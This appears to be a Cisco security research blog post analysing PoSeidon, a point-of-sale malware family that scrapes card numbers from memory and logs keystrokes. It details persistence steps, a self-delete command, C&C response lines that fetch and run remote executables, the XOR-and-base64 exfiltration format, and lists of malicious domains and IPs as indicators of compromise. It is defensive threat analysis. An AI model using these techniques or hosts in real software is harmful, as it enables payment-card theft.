This post was authored by Andrea Allievi, Ben Baker, Nick Biasini, JJ Cummings, Douglas Goddard, William Largent, Angel Villegas, and Alain Zidouemba

Cisco's Security Solutions (CSS) consists of information security experts with a unique blend of law enforcement, enterprise security and technology security backgrounds. The team works directly with Cisco's Talos Security Intelligence & Research Group to identify known and unknown threats, quantify and prioritize risk, and minimize future risk.

When consumers make purchases from a retailer, the transaction is processed through Point-of-Sale (PoS) systems. When a creditordebit card is used, a PoS system is used to read the information stored on the magnetic stripe on the back of the credit card. Once this information gets stolen from a merchant, it can be encoded into a magnetic stripe and used with a new card. Criminal markets exist for this valuable information because the attackers are able to easily monetize stolen credit card data. Incidents involving PoS malware have been on the rise, affecting many large organizations as well as small mom-and-pop establishments and garnering a lot of media attention. The presence of large amounts of financial and personal information ensures that these companies and their retail PoS systems will remain attractive targets.

Overview

There is a new malware family targeting PoS systems, infecting machines to scrape memory for credit card information and exfiltrate that data to servers, also primarily.ru TLD, for harvesting and likely resale. This new malware family, that we've nicknamed PoSeidon, has a few components to it, as illustrated by the diagram below:

At a high level, it starts with aLoaderbinary that upon being executed will first try to maintain persistence on the target machine in order to survive a possible system reboot. TheLoaderthen contacts a command and control server, retrieving a URL which contains another binary to download and execute. The downloaded binary,FindStr, installs a keylogger and scans the memory of the PoS device for number sequences that could be credit card numbers. Upon verifying that the numbers are in fact credit card numbers, keystrokes and credit card numbers are encoded and sent to an exfiltration server.

Technical details

Keylogger

The file with SHA256 334079dc9fa5b06fbd68e81de903fcd4e356b4f2d0e8bbd6bdca7891786c39d4 could perhaps be at the source of the PoS system compromise. We call this file KeyLogger based on debugging information found in the binary:

Upon execution, this file copies itself to either%SystemRoot%\system32\<filename>.exe or %UserProfile%\<filename>.exeand adds registry entry underHKLM (or HKCU)\Software\Microsoft\Windows\CurrentVersion\Run.

The file also opensHKCU\Software\LogMeIn Ignitionand enumerates the keys for the account sub key, opens it and deletes thePasswordTicketValue and obtains theEmailValue. Also deletes registry treeHKCU\Software\LogMeIn Ignition\<key>\Profiles\* .

The file sends to an exfiltration server by POSTing data to one of these URIs:

• wondertechmy[.]com/pes/viewtopic.php
• wondertechmy[.]ru/pes/viewtopic.php
• wondwondnew[.]ru/pes/viewtopic.php

 The URI format is

uid=%I64u&win=%d.%d&vers=%s

The Keylogger component was potentially used to steal passwords and could have been the initial infection vector.

Loader

The loader for the PoSeidon PoS malware gets its name from debugging information found in the binary:

Upon being run,Loaderchecks to see if it's being executed with one of these two file names:

• WinHost.exe
• WinHost32.exe

If it is not, it will make sure that no Windows service is running with the name WinHost.Loaderwill copy itself to%SystemRoot%\System32\WinHost.exe, overwriting any file in that location that would happen to have the same name. Next,Loaderwill start a service named WinHost.

This is done so that it remains running in memory even if the current user logs off. IfLoaderis not able to install itself as a service, it will try to find other instances of itself running in memory and terminate them. Subsequently, it will copy itself to%UserProfile%\WinHost32.exeand install the registry keyHKCU\Microsoft\Windows\CurrentVersion\Run\WinHost32. Finally, it will create a new process to execute%UserProfile%\WinHost32.exe.

Now that persistence has been achieved, Loader will delete itself by running the following command:

• cmd.exe /c del <path_to_itself> >> NUL

The instance ofLoaderrunning in memory attempt to read configuration data at%SystemRoot%\System32\WinHost.exe.cfg. This file can hold a list of URLs to be added to a list of hardcoded URLs already contained inLoader.

Loader then attempts to contact one of the hardcoded C&C server:

• linturefa.com
• xablopefgr.com
• tabidzuwek.com
• lacdileftre.ru
• tabidzuwek.com
• xablopefgr.com
• lacdileftre.ru
• weksrubaz.ru
• linturefa.ru
• mifastubiv.ru
• xablopefgr.ru
• tabidzuwek.ru

Associated IP Addresses:

• 151.236.11.167
• 185.13.32.132
• 185.13.32.48
• REDACTED at request of Federal Law Enforcement
• 31.184.192.196
• 91.220.131.116
• 91.220.131.87

If one of the domains above resolve to an IP address an HTTP POST is made using the following user-agent string:

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

POST data is sent to either:

• <IP ADDRESS>/ldl01/viewtopic.php
• <IP ADDRESS>/pes2/viewtopic.php

POST data follows the format:

uid=%I64u&uinfo=%s&win=%d.%d&bits=%d&vers=%s&build=%s

Loader expects the following response from the C&C server:

{<CommandLetter>:<ArgumentString>}

Example response:

• {R:http://badguy.com/malwarefilename.exe}
• {b:pes13n|373973303|https://01.220.131.116/ldl01/files/pes13n.exe}|373973303|https://01.220.131.116/ldl01/files/pes13n.exe}

It's by fetching and executing the executable referenced in the server response that the second part of PoSeidon finds its way to the PoS device.

FindStr

The loader for the PoSeidon PoS malware gets its name from debugging information found in the binary:

An embedded PE is extracted through shellcode and execution continues with the embedded binary. This file installs a minimal keylogger that is implemented similarly to the description found here. The data intercepted by this keylogger will later be sent to an exfiltration server.

The PE then cycles through all running processes on the PoS device to look for processes with a security tokennotassociated with the "NT AUTHORITY" domain name. It iterates through all read/write pages within those processes for credit card info.

The malware only looks for number sequences that start with:

• 6, 5, 4 with a length of 16 digits (Discover, Visa, Mastercard)
• 3 with a length of 15 digits (AMEX)

It then uses the Luhn algorithm to verify that the numbers are actually credit or debit card numbers as shown by the code segment below:

Next, DNS resolution is attempted for the domains below. These are some of the known data exfiltration servers:

• quartlet.com
• horticartf.com
• kilaxuntf.ru
• dreplicag.ru
• fimzusoln.ru
• wetguqan.ru

If one of the domains above resolve to an IP address an HTTP POST is made using the following user-agent string:

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

POST data is sent to:

<IP ADDRESS>/pes13/viewtopic.php

Data follows the following format:

oprat=2&uid=%I64u&uinfo=%s&win=%d.%d&vers=%s

optional POST data (data: credit card numbers, logs: keylogger data)

&data=<XORed_with_0x2A_then_base64_data_unk>
&logs=<XORed_with_0x2A_then_base64_data_unk>

Credit card numbers and keylogger data is sent to the exfiltration server after being XORed and base64 encoded.

The expect response from the exfiltration server is:

This mechanism allows for the the malware to update itself, based on commands received from the exfiltration server.

Loader vs FindStr

Comparing an unpacked copy ofLoaderversion 11.4  to an unpacked copy ofFindStrversion 7.1 with Bindiff shows that 62% of the functionality in both samples is the same. The actors behind this malware probably developed some core functionality and compiled it into a library to be used by other projects they are developing.

 IOC

Win.Trojan.PoSeidon.RegistryItem.ioc
Win.Trojan.PoSeidon.ProcessItem.ioc
Win.Trojan.PoSeidon.FileItem.ioc

Domains

• linturefa.com
• xablopefgr.com
• tabidzuwek.com
• linturefa.ru
• xablopefgr.ru
• tabidzuwek.ru
• weksrubaz.ru
• mifastubiv.ru
• lacdileftre.ru
• quartlet.com
• horticartf.com
• kilaxuntf.ru
• dreplicag.ru
• fimzusoln.ru
• wetguqan.ru

 IP Addresses:

• 151.236.11.167
• 185.13.32.132
• 185.13.32.48
• REDACTED at request of Federal Law Enforcement
• 31.184.192.196
• 91.220.131.116
• 91.220.131.87
• REDACTED at request of Federal Law Enforcement

Conclusion

PoSeidon is another in the growing number of Point-of-Sale malware targeting PoS systems that demonstrate the sophisticated  techniques and approaches of malware authors. Attackers will continue to target PoS systems and employ various obfuscation techniques in an attempt to avoid detection. As long as PoS attacks continue to provide returns, attackers will continue to invest in innovation and development of new malware families. Network administrators will need to remain vigilant and adhere to industry best practices to ensure coverage and protection against advancing malware threats.

Snort Rules: 33836-33852. Please refer to Defense Center or FIREsight management console for updated information.

Protecting Users from These Threats

We encourage organizations to consider security best practices, starting with a threat-centric approach. Given the dynamic threat landscape, we advocate this threat-centric and operationalized approach that implements protections across the extended network -and across the full attack continuum -before, during, and after an attack. This approach is predicated upon superior visibility, continuous control, and advanced threat protection across the extended network and the entire attack continuum